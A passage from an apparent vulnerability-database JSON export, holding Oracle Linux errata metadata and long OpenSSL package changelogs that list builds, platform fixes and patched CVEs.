(#205180)\n[0.9.8b-5]\n- set buffering to none on stdio/stdout FILE when bufsize is set (#200580)\n patch by IBM\n[0.9.8b-4.1]\n- rebuild with new binutils (#200330)\n[0.9.8b-4]\n- add a temporary workaround for sha512 test failure on s390 (#199604)\n* Thu Jul 20 2006 Tomas Mraz \n- add ipv6 support to s_client and s_server (by Jan Pazdziora) (#198737)\n- add patches for BN threadsafety, AES cache collision attack hazard fix and\n pkcs7 code memleak fix from upstream CVS\n[0.9.8b-3.1]\n- rebuild\n[0.9.8b-3]\n- dropped libica and ica engine from build\n* Wed Jun 21 2006 Joe Orton \n- update to new CA bundle from mozilla.org; adds CA certificates\n from netlock.hu and startcom.org\n[0.9.8b-2]\n- fixed a few rpmlint warnings\n- better fix for #173399 from upstream\n- upstream fix for pkcs12\n[0.9.8b-1]\n- upgrade to new version, stays ABI compatible\n- there is no more linux/config.h (it was empty anyway)\n[0.9.8a-6]\n- fix stale open handles in libica (#177155)\n- fix build if 'rand' or 'passwd' in buildroot path (#178782)\n- initialize VIA Padlock engine (#186857)\n[0.9.8a-5.2]\n- bump again for double-long bug on ppc(64)\n[0.9.8a-5.1]\n- rebuilt for new gcc4.1 snapshot and glibc changes\n[0.9.8a-5]\n- don't include SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG\n in SSL_OP_ALL (#175779)\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[0.9.8a-4]\n- fix build (-lcrypto was erroneusly dropped) of the updated libica\n- updated ICA engine to 1.3.6-rc3\n[0.9.8a-3]\n- disable builtin compression methods for now until they work\n properly (#173399)\n[0.9.8a-2]\n- don't set -rpath for openssl binary\n[0.9.8a-1]\n- new upstream version\n- patches partially renumbered\n[0.9.7f-11]\n- updated IBM ICA engine library and patch to latest upstream version\n[0.9.7f-10]\n- fix CAN-2005-2969 - remove SSL_OP_MSIE_SSLV2_RSA_PADDING which\n disables the countermeasure against man in the middle attack in SSLv2\n (#169863)\n- use sha1 as default for CA and cert requests - CAN-2005-2946 (#169803)\n[0.9.7f-9]\n- add *.so.soversion as symlinks in /lib (#165264)\n- remove unpackaged symlinks (#159595)\n- fixes from upstream (constant time fixes for DSA,\n bn assembler div on ppc arch, initialize memory on realloc)\n[0.9.7f-8]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7f-7]\n- fix CAN-2005-0109 - use constant time/memory access mod_exp\n so bits of private key aren't leaked by cache eviction (#157631)\n- a few more fixes from upstream 0.9.7g\n[0.9.7f-6]\n- use poll instead of select in rand (#128285)\n- fix Makefile.certificate to point to /etc/pki/tls\n- change the default string mask in ASN1 to PrintableString+UTF8String\n[0.9.7f-5]\n- update to revision 1.37 of Mozilla CA bundle\n[0.9.7f-4]\n- move certificates to _sysconfdir/pki/tls (#143392)\n- move CA directories to _sysconfdir/pki/CA\n- patch the CA script and the default config so it points to the\n CA directories\n[0.9.7f-3]\n- uninitialized variable mustn't be used as input in inline\n assembly\n- reenable the x86_64 assembly again\n[0.9.7f-2]\n- add back RC4_CHAR on ia64 and x86_64 so the ABI isn't broken\n- disable broken bignum assembly on x86_64\n[0.9.7f-1]\n- reenable optimizations on ppc64 and assembly code on ia64\n- upgrade to new upstream version (no soname bump needed)\n- disable thread test - it was testing the backport of the\n RSA blinding - no longer needed\n- added support for changing serial number to\n Makefile.certificate (#151188)\n- make ca-bundle.crt a config file (#118903)\n[0.9.7e-3]\n- libcrypto shouldn't depend on libkrb5 (#135961)\n[0.9.7e-2]\n- rebuild\n[0.9.7e-1]\n- new upstream source, updated patches\n- added patch so we are hopefully ABI compatible with upcoming\n 0.9.7f\n* Thu Feb 10 2005 Tomas Mraz \n- Support UTF-8 charset in the Makefile.certificate (#134944)\n- Added cmp to BuildPrereq\n[0.9.7a-46]\n- generate new ca-bundle.crt from Mozilla certdata.txt (revision 1.32)\n[0.9.7a-45]\n- Fixed and updated libica-1.3.4-urandom.patch patch (#122967)\n[0.9.7a-44]\n- rebuild\n[0.9.7a-43]\n- rebuild\n[0.9.7a-42]\n- rebuild\n[0.9.7a-41]\n- remove der_chop, as upstream cvs has done (CAN-2004-0975, #140040)\n[0.9.7a-40]\n- Include latest libica version with important bugfixes\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[0.9.7a-38]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7a-37]\n- build for linux-alpha-gcc instead of alpha-gcc on alpha (Jeff Garzik)\n[0.9.7a-36]\n- handle %{_arch}=i486/i586/i686/athlon cases in the intermediate\n header (#124303)\n[0.9.7a-35]\n- add security fixes for CAN-2004-0079, CAN-2004-0112\n* Tue Mar 16 2004 Phil Knirsch \n- Fixed libica filespec.\n[0.9.7a-34]\n- ppc/ppc64 define __powerpc__/__powerpc64__, not __ppc__/__ppc64__, fix\n the intermediate header\n[0.9.7a-33]\n- add an intermediate \n which points to the right\n arch-specific opensslconf.h on multilib arches\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n[0.9.7a-32]\n- Updated libica to latest upstream version 1.3.5.\n[0.9.7a-31]\n- Update ICA crypto engine patch from IBM to latest version.\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[0.9.7a-29]\n- rebuilt\n[0.9.7a-28]\n- Fixed libica build.\n* Wed Feb 04 2004 Nalin Dahyabhai \n- add '-ldl' to link flags added for Linux-on-ARM (#99313)\n[0.9.7a-27]\n- updated ca-bundle.crt: removed expired GeoTrust roots, added\n freessl.com root, removed trustcenter.de Class 0 root\n[0.9.7a-26]\n- Fix link line for libssl (bug #111154).\n[0.9.7a-25]\n- add dependency on zlib-devel for the -devel package, which depends on zlib\n symbols because we enable zlib for libssl (#102962)\n[0.9.7a-24]\n- Use /dev/urandom instead of PRNG for libica.\n- Apply libica-1.3.5 fix for /dev/urandom in icalinux.c\n- Use latest ICA engine patch from IBM.\n[0.9.7a-22.1]\n- rebuild\n[0.9.7a-22]\n- rebuild (22 wasn't actually built, fun eh?)\n[0.9.7a-23]\n- re-disable optimizations on ppc64\n* Tue Sep 30 2003 Joe Orton \n- add a_mbstr.c fix for 64-bit platforms from CVS\n[0.9.7a-22]\n- add -Wa,--noexecstack to RPM_OPT_FLAGS so that assembled modules get tagged\n as not needing executable stacks\n[0.9.7a-21]\n- rebuild\n* Thu Sep 25 2003 Nalin Dahyabhai \n- re-enable optimizations on ppc64\n* Thu Sep 25 2003 Nalin Dahyabhai \n- remove exclusivearch\n[0.9.7a-20]\n- only parse a client cert if one was requested\n- temporarily exclusivearch for %{ix86}\n* Tue Sep 23 2003 Nalin Dahyabhai \n- add security fixes for protocol parsing bugs (CAN-2003-0543, CAN-2003-0544)\n and heap corruption (CAN-2003-0545)\n- update RHNS-CA-CERT files\n- ease back on the number of threads used in the threading test\n[0.9.7a-19]\n- rebuild to fix gzipped file md5sums (#91211)\n[0.9.7a-18]\n- Updated libica to version 1.3.4.\n[0.9.7a-17]\n- rebuild\n[0.9.7a-10.9]\n- free the kssl_ctx structure when we free an SSL structure (#99066)\n[0.9.7a-16]\n- rebuild\n[0.9.7a-15]\n- lower thread test count on s390x\n[0.9.7a-14]\n- rebuild\n[0.9.7a-13]\n- disable assembly on arches where it seems to conflict with threading\n[0.9.7a-12]\n- Updated libica to latest upstream version 1.3.0\n[0.9.7a-9.9]\n- rebuild\n[0.9.7a-11]\n- rebuild\n[0.9.7a-10]\n- ubsec: don't stomp on output data which might also be input data\n[0.9.7a-9]\n- temporarily disable optimizations on ppc64\n* Mon Jun 09 2003 Nalin Dahyabhai \n- backport fix for engine-used-for-everything from 0.9.7b\n- backport fix for prng not being seeded causing problems, also from 0.9.7b\n- add a check at build-time to ensure that RSA is thread-safe\n- keep perlpath from stomping on the libica configure scripts\n* Fri Jun 06 2003 Nalin Dahyabhai \n- thread-safety fix for RSA blinding\n[0.9.7a-8]\n- rebuilt\n[0.9.7a-7]\n- Added libica-1.2 to openssl (featurerequest).\n[0.9.7a-6]\n- fix building with incorrect flags on ppc64\n[0.9.7a-5]\n- add patch to harden against Klima-Pokorny-Rosa extension of Bleichenbacher's\n attack (CAN-2003-0131)\n[ 0.9.7a-4]\n- add patch to enable RSA blinding by default, closing a timing attack\n (CAN-2003-0147)\n[0.9.7a-3]\n- disable use of BN assembly module on x86_64, but continue to allow inline\n assembly (#83403)\n[0.9.7a-2]\n- disable EC algorithms\n[0.9.7a-1]\n- update to 0.9.7a\n[0.9.7-8]\n- add fix to guard against attempts to allocate negative amounts of memory\n- add patch for CAN-2003-0078, fixing a timing attack\n[0.9.7-7]\n- Add openssl-ppc64.patch\n[0.9.7-6]\n- EVP_DecryptInit should call EVP_CipherInit() instead of EVP_CipherInit_ex(),\n to get the right behavior when passed uninitialized context structures\n (#83766)\n- build with -mcpu=ev5 on alpha family (#83828)\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[0.9.7-4]\n- Added IBM hw crypto support patch.\n* Wed Jan 15 2003 Nalin Dahyabhai \n- add missing builddep on sed\n[0.9.7-3]\n- debloat\n- fix broken manpage symlinks\n[0.9.7-2]\n- fix double-free in 'openssl ca'\n[0.9.7-1]\n- update to 0.9.7 final\n[0.9.7-0]\n- update to 0.9.7 beta6 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n* Wed Dec 11 2002 Nalin Dahyabhai \n- update to 0.9.7 beta5 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n[0.9.6b-30]\n- add configuration stanza for x86_64 and use it on x86_64\n- build for linux-ppc on ppc\n- start running the self-tests again\n[0.9.6b-29hammer.3]\n- Merge fixes from previous hammer packages, including general x86-64 and\n multilib\n[0.9.6b-29]\n- rebuild\n[0.9.6b-28]\n- update asn patch to fix accidental reversal of a logic check\n[0.9.6b-27]\n- update asn patch to reduce chance that compiler optimization will remove\n one of the added tests\n[0.9.6b-26]\n- rebuild\n[0.9.6b-25]\n- add patch to fix ASN.1 vulnerabilities\n[0.9.6b-24]\n- add backport of Ben Laurie's patches for OpenSSL 0.9.6d\n[0.9.6b-23]\n- own {_datadir}/ssl/misc\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Sun May 26 2002 Tim Powers \n- automated rebuild\n[0.9.6b-20]\n- free ride through the build system (whee!)\n[0.9.6b-19]\n- rebuild in new environment\n[0.9.6b-17, 0.9.6b-18]\n- merge RHL-specific bits into stronghold package, rename\n[stronghold-0.9.6c-2]\n- add support for Chrysalis Luna token\n* Tue Mar 26 2002 Gary Benson \n- disable AEP random number generation, other AEP fixes\n[0.9.6b-15]\n- only build subpackages on primary arches\n[0.9.6b-13]\n- on ia32, only disable use of assembler on i386\n- enable assembly on ia64\n[0.9.6b-11]\n- fix sparcv9 entry\n[stronghold-0.9.6c-1]\n- upgrade to 0.9.6c\n- bump BuildArch to i686 and enable assembler on all platforms\n- synchronise with shrimpy and rawhide\n- bump soversion to 3\n* Wed Oct 10 2001 Florian La Roche \n- delete BN_LLONG for s390x, patch from Oliver Paukstadt\n[0.9.6b-9]\n- update AEP driver patch\n* Mon Sep 10 2001 Nalin Dahyabhai \n- adjust RNG disabling patch to match version of patch from Broadcom\n[0.9.6b-8]\n- disable the RNG in the ubsec engine driver\n[0.9.6b-7]\n- tweaks to the ubsec engine driver\n[0.9.6b-6]\n- tweaks to the ubsec engine driver\n[0.9.6b-5]\n- update ubsec engine driver from Broadcom\n[0.9.6b-4]\n- move man pages back to %{_mandir}/man?/foo.?ssl from\n %{_mandir}/man?ssl/foo.?\n- add an [ engine ] section to the default configuration file\n* Thu Aug 09 2001 Nalin Dahyabhai \n- add a patch for selecting a default engine in SSL_library_init()\n[0.9.6b-3]\n- add patches for AEP hardware support\n- add patch to keep trying when we fail to load a cert from a file and\n there are more in the file\n- add missing prototype for ENGINE_ubsec() in engine_int.h\n[0.9.6b-2]\n- actually add hw_ubsec to the engine list\n* Tue Jul 17 2001 Nalin Dahyabhai \n- add in the hw_ubsec driver from CVS\n[0.9.6b-1]\n- update to 0.9.6b\n* Thu Jul 05 2001 Nalin Dahyabhai \n- move .so symlinks back to %{_libdir}\n* Tue Jul 03 2001 Nalin Dahyabhai \n- move shared libraries to /lib (#38410)\n* Mon Jun 25 2001 Nalin Dahyabhai \n- switch to engine code base\n* Mon Jun 18 2001 Nalin Dahyabhai \n- add a script for creating dummy certificates\n- move man pages from %{_mandir}/man?/foo.?ssl to %{_mandir}/man?ssl/foo.?\n* Thu Jun 07 2001 Florian La Roche \n- add s390x support\n* Fri Jun 01 2001 Nalin Dahyabhai \n- change two memcpy() calls to memmove()\n- don't define L_ENDIAN on alpha\n[stronghold-0.9.6a-1]\n- Add 'stronghold-' prefix to package names.\n- Obsolete standard openssl packages.\n* Wed May 16 2001 Joe Orton \n- Add BuildArch: i586 as per Nalin's advice.\n* Tue May 15 2001 Joe Orton \n- Enable assembler on ix86 (using new .tar.bz2 which does\n include the asm directories).\n* Tue May 15 2001 Nalin Dahyabhai \n- make subpackages depend on the main package\n* Tue May 01 2001 Nalin Dahyabhai \n- adjust the hobble script to not disturb symlinks in include/ (fix from\n Joe Orton)\n* Fri Apr 27 2001 Nalin Dahyabhai \n- drop the m2crypo patch we weren't using\n* Tue Apr 24 2001 Nalin Dahyabhai \n- configure using 'shared' as well\n* Sun Apr 08 2001 Nalin Dahyabhai \n- update to 0.9.6a\n- use the build-shared target to build shared libraries\n- bump the soversion to 2 because we're no longer compatible with\n our 0.9.5a packages or our 0.9.6 packages\n- drop the patch for making rsatest a no-op when rsa null support is used\n- put all man pages into \nssl instead of \n- break the m2crypto modules into a separate package\n* Tue Mar 13 2001 Nalin Dahyabhai \n- use BN_LLONG on s390\n* Mon Mar 12 2001 Nalin Dahyabhai \n- fix the s390 changes for 0.9.6 (isn't supposed to be marked as 64-bit)\n* Sat Mar 03 2001 Nalin Dahyabhai \n- move c_rehash to the perl subpackage, because it's a perl script now\n* Fri Mar 02 2001 Nalin Dahyabhai \n- update to 0.9.6\n- enable MD2\n- use the libcrypto.so and libssl.so targets to build shared libs with\n- bump the soversion to 1 because we're no longer compatible with any of\n the various 0.9.5a packages circulating around, which provide lib*.so.0\n* Wed Feb 28 2001 Florian La Roche \n- change hobble-openssl for disabling MD2 again\n* Tue Feb 27 2001 Nalin Dahyabhai \n- re-disable MD2 -- the EVP_MD_CTX structure would grow from 100 to 152\n bytes or so, causing EVP_DigestInit() to zero out stack variables in\n apps built against a version of the library without it\n* Mon Feb 26 2001 Nalin Dahyabhai \n- disable some inline assembly, which on x86 is Pentium-specific\n- re-enable MD2 (see http://www.ietf.org/ietf/IPR/RSA-MD-all)\n* Thu Feb 08 2001 Florian La Roche \n- fix s390 patch\n* Fri Dec 08 2000 Than Ngo \n- added support s390\n* Mon Nov 20 2000 Nalin Dahyabhai \n- remove -Wa,* and -m* compiler flags from the default Configure file (#20656)\n- add the CA.pl man page to the perl subpackage\n* Thu Nov 02 2000 Nalin Dahyabhai \n- always build with -mcpu=ev5 on alpha\n* Tue Oct 31 2000 Nalin Dahyabhai \n- add a symlink from cert.pem to ca-bundle.crt\n* Wed Oct 25 2000 Nalin Dahyabhai \n- add a ca-bundle file for packages like Samba to reference for CA certificates\n* Tue Oct 24 2000 Nalin Dahyabhai \n- remove libcrypto's crypt(), which doesn't handle md5crypt (#19295)\n* Mon Oct 02 2000 Nalin Dahyabhai \n- add unzip as a buildprereq (#17662)\n- update m2crypto to 0.05-snap4\n* Tue Sep 26 2000 Bill Nottingham \n- fix some issues in building when it's not installed\n* Wed Sep 06 2000 Nalin Dahyabhai \n- make sure the headers we include are the ones we built with (aaaaarrgh!)\n* Fri Sep 01 2000 Nalin Dahyabhai \n- add Richard Henderson's patch for BN on ia64\n- clean up the changelog\n* Tue Aug 29 2000 Nalin Dahyabhai \n- fix the building of python modules without openssl-devel already installed\n* Wed Aug 23 2000 Nalin Dahyabhai \n- byte-compile python extensions without the build-root\n- adjust the makefile to not remove temporary files (like .key files when\n building .csr files) by marking them as .PRECIOUS\n* Sat Aug 19 2000 Nalin Dahyabhai \n- break out python extensions into a subpackage\n* Mon Jul 17 2000 Nalin Dahyabhai \n- tweak the makefile some more\n* Tue Jul 11 2000 Nalin Dahyabhai \n- disable MD2 support\n* Thu Jul 06 2000 Nalin Dahyabhai \n- disable MDC2 support\n* Sun Jul 02 2000 Nalin Dahyabhai \n- tweak the disabling of RC5, IDEA support\n- tweak the makefile\n* Thu Jun 29 2000 Nalin Dahyabhai \n- strip binaries and libraries\n- rework certificate makefile to have the right parts for Apache\n* Wed Jun 28 2000 Nalin Dahyabhai \n- use %{_perl} instead of /usr/bin/perl\n- disable alpha until it passes its own test suite\n* Fri Jun 09 2000 Nalin Dahyabhai \n- move the passwd.1 man page out of the passwd package's way\n* Fri Jun 02 2000 Nalin Dahyabhai \n- update to 0.9.5a, modified for U.S.\n- add perl as a build-time requirement\n- move certificate makefile to another package\n- disable RC5, IDEA, RSA support\n- remove optimizations for now\n* Wed Mar 01 2000 Florian La Roche \n- Bero told me to move the Makefile into this package\n* Wed Mar 01 2000 Florian La Roche \n- add lib*.so symlinks to link dynamically against shared libs\n* Tue Feb 29 2000 Florian La Roche \n- update to 0.9.5\n- run ldconfig directly in post/postun\n- add FAQ\n* Sat Dec 18 1999 Bernhard Rosenkrdnzer \n- Fix build on non-x86 platforms\n* Fri Nov 12 1999 Bernhard Rosenkrdnzer \n- move /usr/share/ssl/* from -devel to main package\n* Tue Oct 26 1999 Bernhard Rosenkrdnzer \n- inital packaging\n- changes from base:\n - Move /usr/local/ssl to /usr/share/ssl for FHS compliance\n - handle RPM_OPT_FLAGS\nopenssl-1.0.1-beta2-rpmbuild.patch\nopenssl-0.9.8a-no-rpath.patch", "edition": 73, "modified": "2015-04-02T00:00:00", "published": "2015-04-02T00:00:00", "id": "ELSA-2015-3022", "href": "http://linux.oracle.com/errata/ELSA-2015-3022.html", "title": "openssl-fips security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:03", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4000", "CVE-2014-3505", "CVE-2014-3508", "CVE-2015-1792", "CVE-2014-3566", "CVE-2006-3738", "CVE-2018-0732", "CVE-2009-1379", "CVE-2006-2940", "CVE-2006-2937", "CVE-2015-3197", "CVE-2007-4995", "CVE-2009-1377", "CVE-2014-3572", "CVE-2016-6306", "CVE-2016-0705", "CVE-2015-0206", "CVE-2015-1789", "CVE-2016-2183", "CVE-2015-0286", "CVE-2013-6449", "CVE-2018-5407", "CVE-2016-2178", "CVE-2018-0495", "CVE-2006-4343", "CVE-2017-3735", "CVE-2003-0544", "CVE-2007-3108", "CVE-2014-3507", "CVE-2015-3195", "CVE-2003-0543", "CVE-2016-2108", "CVE-2003-0545", "CVE-2005-2946", "CVE-2014-3571", "CVE-2005-2969", "CVE-2016-0799", "CVE-2016-6302", "CVE-2006-4339", "CVE-2004-0112", "CVE-2014-3513", "CVE-2016-2177", "CVE-2015-0288", "CVE-2009-4355", "CVE-2014-0224", "CVE-2010-4180", "CVE-2016-2105", "CVE-2010-0742", "CVE-2008-0891", "CVE-2015-3194", "CVE-2016-2107", "CVE-2004-0975", "CVE-2017-3737", "CVE-2003-0131", "CVE-2014-3511", "CVE-2004-0079", "CVE-2007-5135", "CVE-2011-0014", "CVE-2014-8275", "CVE-2016-2180", "CVE-2016-0797", "CVE-2016-0702", "CVE-2014-3570", "CVE-2009-1378", "CVE-2015-7575", "CVE-2015-3196", "CVE-2014-3470", "CVE-2014-3506", "CVE-2016-2109", "CVE-2016-2181", "CVE-2016-6304", "CVE-2013-6450", "CVE-2018-0739", "CVE-2012-0050", "CVE-2009-3555", "CVE-2010-1633", "CVE-2015-0293", "CVE-2010-5298", "CVE-2014-0160", "CVE-2014-8176", "CVE-2013-4353", "CVE-2008-1672", "CVE-2014-0195", "CVE-2014-0198", "CVE-2015-0209", "CVE-2014-3567", "CVE-2015-0204", "CVE-2012-2110", "CVE-2015-1790", "CVE-2017-3738", "CVE-2014-3510", "CVE-2016-2182", "CVE-2010-3864", "CVE-2005-0109", "CVE-2015-0287", "CVE-2011-3207", "CVE-2015-0289", "CVE-2017-3736", "CVE-2015-3216", "CVE-2015-0292", "CVE-2018-0737", "CVE-2003-0078", "CVE-2015-0205", "CVE-2016-2179", "CVE-2016-2106", "CVE-2003-0147", "CVE-2014-3509", "CVE-2015-1791", "CVE-2014-0221"], "description": "[1.0.2k-16.0.1.el7_6.1]\n- Bump release for rebuild.\n[1.0.2k-16.1]\n- use SHA-256 in FIPS RSA pairwise key check\n- fix CVE-2018-5407 - EC signature local timing side-channel key extraction\n[1.0.2k-16]\n- fix CVE-2018-0495 - ROHNP - Key Extraction Side Channel on DSA, ECDSA\n- fix incorrect error message on FIPS DSA parameter generation (#1603597)\n[1.0.2k-14]\n- ppc64le is not multilib architecture (#1585004)\n[1.0.2k-13]\n- add S390x assembler updates\n- make CA name list comparison function case sensitive (#1548401)\n- fix CVE-2017-3735 - possible one byte overread with X.509 IPAdressFamily\n- fix CVE-2018-0732 - large prime DH DoS of TLS client\n- fix CVE-2018-0737 - RSA key generation cache timing vulnerability\n- fix CVE-2018-0739 - stack overflow parsing recursive ASN.1 structure\n[1.0.2k-12]\n- fix CVE-2017-3737 - incorrect handling of fatal error state\n- fix CVE-2017-3738 - AVX2 Montgomery multiplication bug with 1024 bit modulus\n[1.0.2k-11]\n- fix deadlock in RNG in the FIPS mode in mariadb\n[1.0.2k-9]\n- fix CVE-2017-3736 - carry propagation bug in Montgomery multiplication\n[1.0.2k-8]\n- fix regression in openssl req -x509 command (#1450015)\n[1.0.2k-7]\n- handle incorrect size gracefully in aes_p8_cbc_encrypt()\n[1.0.2k-6]\n- allow long client hellos to be received by server\n[1.0.2k-5]\n- fix CPU features detection on new AMD processors\n[1.0.2k-4]\n- add support for additional STARTTLS protocols to s_client\n original backported patch by Robert Scheck (#1396209)\n[1.0.2k-3]\n- properly document the SSLv2 support removal\n[1.0.2k-2]\n- add PPC assembler updates\n[1.0.2k-1]\n- minor upstream release 1.0.2k fixing security issues\n[1.0.2j-2]\n- deprecate and disable verification of insecure hash algorithms\n- add support for /etc/pki/tls/legacy-settings also for minimum DH length\n accepted by SSL client\n- compare the encrypt and tweak key in XTS as required by FIPS\n[1.0.2j-1]\n- rebase to latest upstream release from the 1.0.2 branch, ABI compatible\n[1.0.1e-60]\n- fix CVE-2016-2177 - possible integer overflow\n- fix CVE-2016-2178 - non-constant time DSA operations\n- fix CVE-2016-2179 - further DoS issues in DTLS\n- fix CVE-2016-2180 - OOB read in TS_OBJ_print_bio()\n- fix CVE-2016-2181 - DTLS1 replay protection and unprocessed records issue\n- fix CVE-2016-2182 - possible buffer overflow in BN_bn2dec()\n- fix CVE-2016-6302 - insufficient TLS session ticket HMAC length check\n- fix CVE-2016-6304 - unbound memory growth with OCSP status request\n- fix CVE-2016-6306 - certificate message OOB reads\n- mitigate CVE-2016-2183 - degrade all 64bit block ciphers and RC4 to\n 112 bit effective strength\n[1.0.1e-58]\n- replace expired testing certificates\n[1.0.1e-57]\n- fix CVE-2016-2105 - possible overflow in base64 encoding\n- fix CVE-2016-2106 - possible overflow in EVP_EncryptUpdate()\n- fix CVE-2016-2107 - padding oracle in stitched AES-NI CBC-MAC\n- fix CVE-2016-2108 - memory corruption in ASN.1 encoder\n- fix CVE-2016-2109 - possible DoS when reading ASN.1 data from BIO\n[1.0.1e-56]\n- fix 1-byte memory leak in pkcs12 parse (#1312112)\n- document some options of the speed command (#1312110)\n- fix high-precision timestamps in timestamping authority\n- enable SCTP support in DTLS\n- use correct digest when exporting keying material in TLS1.2 (#1289620)\n- fix CVE-2016-0799 - memory issues in BIO_printf\n- add support for setting Kerberos service and keytab in\n s_server and s_client\n[1.0.1e-55]\n- fix CVE-2016-0702 - side channel attack on modular exponentiation\n- fix CVE-2016-0705 - double-free in DSA private key parsing\n- fix CVE-2016-0797 - heap corruption in BN_hex2bn and BN_dec2bn\n[1.0.1e-54]\n- fix CVE-2015-3197 - SSLv2 ciphersuite enforcement\n- disable SSLv2 in the generic TLS method\n[1.0.1e-53]\n- fix CVE-2015-7575 - disallow use of MD5 in TLS1.2\n[1.0.1e-52]\n- fix CVE-2015-3194 - certificate verify crash with missing PSS parameter\n- fix CVE-2015-3195 - X509_ATTRIBUTE memory leak\n- fix CVE-2015-3196 - race condition when handling PSK identity hint\n[1.0.1e-51]\n- fix the CVE-2015-1791 fix (broken server side renegotiation)\n[1.0.1e-50]\n- improved fix for CVE-2015-1791\n- add missing parts of CVE-2015-0209 fix for corectness although unexploitable\n[1.0.1e-49]\n- fix CVE-2014-8176 - invalid free in DTLS buffering code\n- fix CVE-2015-1789 - out-of-bounds read in X509_cmp_time\n- fix CVE-2015-1790 - PKCS7 crash with missing EncryptedContent\n- fix CVE-2015-1791 - race condition handling NewSessionTicket\n- fix CVE-2015-1792 - CMS verify infinite loop with unknown hash function\n[1.0.1e-48]\n- fix CVE-2015-3216 - regression in RAND locking that can cause segfaults on\n read in multithreaded applications\n[1.0.1e-47]\n- fix CVE-2015-4000 - prevent the logjam attack on client - restrict\n the DH key size to at least 768 bits (limit will be increased in future)\n[1.0.1e-46]\n- drop the AES-GCM restriction of 2^32 operations because the IV is\n always 96 bits (32 bit fixed field + 64 bit invocation field)\n[1.0.1e-45]\n- update fix for CVE-2015-0287 to what was released upstream\n[1.0.1e-44]\n- fix CVE-2015-0209 - potential use after free in d2i_ECPrivateKey()\n- fix CVE-2015-0286 - improper handling of ASN.1 boolean comparison\n- fix CVE-2015-0287 - ASN.1 structure reuse decoding memory corruption\n- fix CVE-2015-0288 - X509_to_X509_REQ NULL pointer dereference\n- fix CVE-2015-0289 - NULL dereference decoding invalid PKCS#7 data\n- fix CVE-2015-0292 - integer underflow in base64 decoder\n- fix CVE-2015-0293 - triggerable assert in SSLv2 server\n[1.0.1e-43]\n- fix broken error detection when unwrapping unpadded key\n[1.0.1e-42.1]\n- fix the RFC 5649 for key material that does not need padding\n[1.0.1e-42]\n- test in the non-FIPS RSA keygen for minimal distance of p and q\n similarly to the FIPS RSA keygen\n[1.0.1e-41]\n- fix CVE-2014-3570 - incorrect computation in BN_sqr()\n- fix CVE-2014-3571 - possible crash in dtls1_get_record()\n- fix CVE-2014-3572 - possible downgrade of ECDH ciphersuite to non-PFS state\n- fix CVE-2014-8275 - various certificate fingerprint issues\n- fix CVE-2015-0204 - remove support for RSA ephemeral keys for non-export\n ciphersuites and on server\n- fix CVE-2015-0205 - do not allow unauthenticated client DH certificate\n- fix CVE-2015-0206 - possible memory leak when buffering DTLS records\n[1.0.1e-40]\n- use FIPS approved method for computation of d in RSA\n- copy digest algorithm when handling SNI context switch\n[1.0.1e-39]\n- fix CVE-2014-3567 - memory leak when handling session tickets\n- fix CVE-2014-3513 - memory leak in srtp support\n- add support for fallback SCSV to partially mitigate CVE-2014-3566\n (padding attack on SSL3)\n[1.0.1e-38]\n- do FIPS algorithm selftest before the integrity check\n[1.0.1e-37]\n- add support for RFC 5649 (#1119738)\n- do not pass the FIPS integrity check if the .hmac files are empty (#1128849)\n- add ECC TLS extensions to DTLS (#1119803)\n- do not send ECC ciphersuites in SSLv2 client hello (#1090955)\n- properly propagate encryption failure in BIO_f_cipher (#1072439)\n- fix CVE-2014-0224 fix that broke EAP-FAST session resumption support\n- improve documentation of ciphersuites - patch by Hubert Kario (#1108026)\n- use case insensitive comparison for servername in s_server (#1081163)\n- add support for automatic ECDH curve selection on server (#1080128)\n- FIPS mode: make the limitations on DSA, DH, and RSA keygen\n length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment\n variable is set\n[1.0.1e-36]\n- add support for ppc64le architecture\n- add Power 8 optimalizations\n[1.0.1e-35]\n- fix CVE-2014-3505 - doublefree in DTLS packet processing\n- fix CVE-2014-3506 - avoid memory exhaustion in DTLS\n- fix CVE-2014-3507 - avoid memory leak in DTLS\n- fix CVE-2014-3508 - fix OID handling to avoid information leak\n- fix CVE-2014-3509 - fix race condition when parsing server hello\n- fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS\n- fix CVE-2014-3511 - disallow protocol downgrade via fragmentation\n[1.0.1e-34.3]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-34]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-33]\n- use the key length from configuration file if req -newkey rsa is invoked\n[1.0.1e-32]\n- avoid unnecessary reseeding in BN_rand in the FIPS mode\n[1.0.1e-31]\n- print ephemeral key size negotiated in TLS handshake (#1057715)\n- add DH_compute_key_padded needed for FIPS CAVS testing\n- make expiration and key length changeable by DAYS and KEYLEN\n variables in the certificate Makefile (#1058108)\n- change default hash to sha256 (#1062325)\n- lower the actual 3des strength so it is sorted behind aes128 (#1056616)\n[1:1.0.1e-30]\n- Mass rebuild 2014-01-24\n[1.0.1e-29]\n- rebuild with -O3 on ppc64 architecture\n[1.0.1e-28]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1:1.0.1e-27]\n- Mass rebuild 2013-12-27\n[1.0.1e-26]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n- drop weak ciphers from the default TLS ciphersuite list\n- add back some symbols that were dropped with update to 1.0.1 branch\n- more FIPS validation requirement changes\n[1.0.1e-25]\n- fix locking and reseeding problems 